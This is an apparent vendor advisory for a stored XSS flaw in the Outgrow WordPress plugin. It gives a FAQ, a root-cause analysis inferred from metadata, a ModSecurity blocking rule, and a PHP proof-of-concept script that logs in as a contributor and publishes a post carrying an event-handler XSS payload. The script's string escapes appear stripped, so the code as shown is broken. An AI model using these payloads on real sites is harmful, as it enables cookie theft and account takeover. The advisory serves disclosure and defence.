What is CVE-2026-1889?

CVE-2026-1889 is a stored cross-site scripting (XSS) vulnerability in the Outgrow plugin for WordPress. It affects versions up to and including 2.1, allowing authenticated users with contributor-level access to inject malicious scripts via the ‘id’ attribute of the ‘outgrow’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the shortcode handler. Attackers can insert a malicious payload into the ‘id’ attribute, which is then stored in the database and executed when users view the affected page.

Who is affected by this vulnerability?

Authenticated users with contributor-level access or higher are affected, as they can create or edit posts containing the vulnerable shortcode. This includes contributors, authors, editors, and administrators.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Outgrow plugin installed on your WordPress site. If it is version 2.1 or earlier, your site is susceptible to CVE-2026-1889.

What are the risks associated with this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, account takeover, and client-side data theft. Attackers may gain access to sensitive information and perform actions on behalf of users, affecting site integrity and user trust.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Outgrow plugin to the latest version that addresses the issue. Additionally, ensure proper output escaping using functions like esc_attr() for the ‘id’ attribute in the shortcode implementation.

What does the CVSS score of 6.4 indicate?

The CVSS score of 6.4 categorizes this vulnerability as medium severity. This indicates a moderate risk level, suggesting that while exploitation is possible, it requires authenticated access, limiting the potential impact compared to higher severity vulnerabilities.

What is the proof of concept for this vulnerability?

The proof of concept illustrates how an attacker with contributor credentials can inject a malicious shortcode into a post. It highlights the lack of proper escaping for the ‘id’ attribute, allowing scripts to execute when the post is viewed.

What steps should I take if my site has been exploited?

If your site has been exploited, immediately remove the malicious shortcode and update the Outgrow plugin. Review user accounts for unauthorized changes and consider restoring from a clean backup if necessary.

Are there any additional security measures I should implement?

In addition to updating the plugin, consider implementing security plugins that monitor for vulnerabilities, regularly auditing user roles and permissions, and ensuring that all plugins and themes are kept up to date.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, always validate and sanitize user inputs, use appropriate escaping functions for output, and conduct regular security audits of your code. Following WordPress coding standards can help mitigate risks.

Where can I find more information about CVE-2026-1889?

For more information, you can refer to the official CVE database, security advisories from the plugin developer, and security blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 28, 2026

CVE-2026-1889: Outgrow <= 2.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'outgrow' Shortcode 'id' Attribute (outgrow)

CVE ID CVE-2026-1889

Plugin outgrow

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.1

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1889 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Outgrow WordPress plugin. The vulnerability exists in the plugin’s ‘outgrow’ shortcode handler, specifically within the processing of the ‘id’ attribute. Attackers with contributor-level permissions or higher can inject malicious scripts into posts or pages. These scripts execute when users view the compromised content. The CVSS score of 6.4 reflects a medium severity issue with scope change and confidentiality/integrity impacts.

Atomic Edge research infers the root cause from the CWE-79 classification and vulnerability description. The plugin fails to properly sanitize user-supplied input and escape output within the shortcode handler. The ‘id’ attribute value likely passes directly to an output function without adequate escaping. This is a classic case of missing or insufficient use of WordPress escaping functions like `esc_attr()` for HTML attributes. The description confirms insufficient input sanitization and output escaping, but the exact code path remains inferred without source code.

Exploitation requires an authenticated user with at least contributor-level access. The attacker creates or edits a post or page using the WordPress editor. They insert the ‘[outgrow]’ shortcode with a malicious ‘id’ attribute payload. A typical payload would resemble `[outgrow id=”1′ onmouseover=’alert(document.cookie)”]`. The attacker publishes the post. The malicious script stores in the database. The script executes in the browsers of all users who view the page containing the compromised shortcode.

Remediation requires implementing proper output escaping. The plugin developer must escape the ‘id’ attribute value before outputting it into the HTML document. The standard WordPress practice is to use the `esc_attr()` function for HTML attribute contexts. Input sanitization for shortcode attributes should also be strengthened, possibly using `sanitize_text_field()` or similar functions. A patch would modify the shortcode callback function to apply these escaping functions to the ‘id’ parameter before its use in generated HTML.

The impact of successful exploitation includes session hijacking, account takeover, and client-side data theft. Attackers can steal authenticated session cookies from administrators or other users. They can perform actions on behalf of victims, such as creating new administrator accounts or modifying site content. The stored nature of the attack amplifies impact, as a single injection affects all future visitors to the compromised page. The attacker’s required contributor-level access is relatively low, increasing the potential attack surface.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-1889 (metadata-based)
# This rule targets the specific attack vector: injection of malicious scripts via the 'id' attribute
# of the 'outgrow' shortcode in WordPress post content.
# The rule blocks POST requests to the WordPress REST API posts endpoint that contain the malicious pattern.
# It assumes the attacker uses the REST API to create/update posts (common for authenticated attacks).
# The rule is narrowly scoped to the specific plugin's shortcode attribute.
SecRule REQUEST_URI "@rx ^/wp-json/wp/v2/(posts|pages)" 
  "id:20261889,phase:2,deny,status:403,chain,msg:'CVE-2026-1889: Outgrow Plugin Stored XSS via shortcode id attribute',severity:'CRITICAL',tag:'CVE-2026-1889',tag:'WordPress',tag:'Plugin/Outgrow',tag:'attack-xss'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule REQUEST_BODY "@rx \[outgrow[^\]]*id\s*=\s*['"]?[^'"]*[\s\S]*?on\w+\s*=" " 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:removeWhitespace,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1889 - Outgrow <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'outgrow' Shortcode 'id' Attribute
<?php
/**
 * Proof of Concept for CVE-2026-1889
 * Assumptions based on vulnerability description:
 * 1. The plugin registers a shortcode named 'outgrow'.
 * 2. The shortcode accepts an 'id' attribute.
 * 3. The 'id' attribute value is not properly escaped before output.
 * 4. Contributor+ users can publish posts containing shortcodes.
 * This script simulates an attacker with contributor credentials injecting a malicious shortcode.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_password'; // CONFIGURE THIS

// Payload: XSS via the 'id' attribute. Uses a simple alert for demonstration.
// Real attacks would use more sophisticated payloads to steal cookies or perform actions.
$malicious_shortcode = "[outgrow id="1' onmouseover='alert("XSS")'"]";

$post_title = 'Test Post with Malicious Shortcode';
$post_content = "This post contains a malicious Outgrow shortcode.nn{$malicious_shortcode}nnHover over the outgrow element to trigger.";

// Step 1: Authenticate to WordPress and obtain a nonce for creating a post.
$login_url = $target_url . '/wp-login.php';
$admin_ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();

// Get login page to retrieve login nonce (if applicable) and cookies.
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
]);
$response = curl_exec($ch);

// Perform login (simplified - real script may need to parse nonce from login form).
$login_data = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]);
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $login_data,
    CURLOPT_FOLLOWLOCATION => true,
]);
$response = curl_exec($ch);

// Step 2: Create a new post with the malicious shortcode.
// This uses the WordPress REST API /wp-json/wp/v2/posts endpoint.
// Contributor users can create posts via REST API if permissions are correctly configured.
$rest_post_url = $target_url . '/wp-json/wp/v2/posts';
$post_data = json_encode([
    'title' => $post_title,
    'content' => $post_content,
    'status' => 'publish' // Contributor can publish if they have 'publish_posts' cap.
]);

curl_setopt_array($ch, [
    CURLOPT_URL => $rest_post_url,
    CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_data,
    CURLOPT_FOLLOWLOCATION => false,
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 201) {
    $response_data = json_decode($response, true);
    $post_id = $response_data['id'] ?? 'unknown';
    $post_link = $response_data['link'] ?? 'unknown';
    echo "[+] Successfully created malicious post.n";
    echo "    Post ID: {$post_id}n";
    echo "    Post URL: {$post_link}n";
    echo "    Visit the post and hover over the outgrow element to trigger XSS.n";
} else {
    echo "[-] Failed to create post. HTTP Code: {$http_code}n";
    echo "    Response: {$response}n";
    echo "    Note: Contributor may need 'publish_posts' capability for REST API.n";
    echo "    Alternative method: Simulate form submission to /wp-admin/post-new.php.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1889?
Overview of the vulnerability
CVE-2026-1889 is a stored cross-site scripting (XSS) vulnerability in the Outgrow plugin for WordPress. It affects versions up to and including 2.1, allowing authenticated users with contributor-level access to inject malicious scripts via the ‘id’ attribute of the ‘outgrow’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the shortcode handler. Attackers can insert a malicious payload into the ‘id’ attribute, which is then stored in the database and executed when users view the affected page.
Who is affected by this vulnerability?
User roles and access levels
Authenticated users with contributor-level access or higher are affected, as they can create or edit posts containing the vulnerable shortcode. This includes contributors, authors, editors, and administrators.
How can I check if my site is vulnerable?
Identifying affected versions
To determine if your site is vulnerable, check the version of the Outgrow plugin installed on your WordPress site. If it is version 2.1 or earlier, your site is susceptible to CVE-2026-1889.
What are the risks associated with this vulnerability?
Potential impacts of exploitation
Exploitation of this vulnerability can lead to session hijacking, account takeover, and client-side data theft. Attackers may gain access to sensitive information and perform actions on behalf of users, affecting site integrity and user trust.
How can I fix this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the Outgrow plugin to the latest version that addresses the issue. Additionally, ensure proper output escaping using functions like esc_attr() for the ‘id’ attribute in the shortcode implementation.
What does the CVSS score of 6.4 indicate?
Understanding severity levels
The CVSS score of 6.4 categorizes this vulnerability as medium severity. This indicates a moderate risk level, suggesting that while exploitation is possible, it requires authenticated access, limiting the potential impact compared to higher severity vulnerabilities.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept illustrates how an attacker with contributor credentials can inject a malicious shortcode into a post. It highlights the lack of proper escaping for the ‘id’ attribute, allowing scripts to execute when the post is viewed.
What steps should I take if my site has been exploited?
Response to exploitation
If your site has been exploited, immediately remove the malicious shortcode and update the Outgrow plugin. Review user accounts for unauthorized changes and consider restoring from a clean backup if necessary.
Are there any additional security measures I should implement?
Enhancing overall site security
In addition to updating the plugin, consider implementing security plugins that monitor for vulnerabilities, regularly auditing user roles and permissions, and ensuring that all plugins and themes are kept up to date.
How can I prevent similar vulnerabilities in the future?
Best practices for plugin development
To prevent similar vulnerabilities, always validate and sanitize user inputs, use appropriate escaping functions for output, and conduct regular security audits of your code. Following WordPress coding standards can help mitigate risks.
Where can I find more information about CVE-2026-1889?
Resources for further reading
For more information, you can refer to the official CVE database, security advisories from the plugin developer, and security blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations